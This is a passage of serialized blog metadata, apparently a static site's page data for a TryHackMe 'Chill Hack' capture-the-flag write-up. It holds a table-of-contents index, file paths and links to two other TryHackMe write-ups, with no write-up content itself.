var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":1026,"depth":1026,"links":1027},4,[1028,1030,1031],{"id":47,"depth":1029,"text":50},2,{"id":155,"depth":1029,"text":158},{"id":276,"depth":1029,"text":279,"children":1032},[1033,1035,1036],{"id":283,"depth":1034,"text":286},3,{"id":523,"depth":1034,"text":526},{"id":904,"depth":1034,"text":907},"markdown","content:posts:2025:tryhackme-chillhack-writeup.md","content","posts\u002F2025\u002Ftryhackme-chillhack-writeup.md","posts\u002F2025\u002Ftryhackme-chillhack-writeup","md","\u002Fposts",[1045,1049],{"_path":1046,"title":1047,"date":1048},"\u002F2025\u002Ftryhackme-wgelctf-writeup","TryHackMe - Wgel CTF","2025-08-27T11:42:45.000Z",{"_path":1050,"title":1051,"date":1052},"\u002F2025\u002Ftryhackme-mustacchio-writeup","TryHackMe - Mustacchio","2025-08-29T13:33:15.000Z",1776934251931]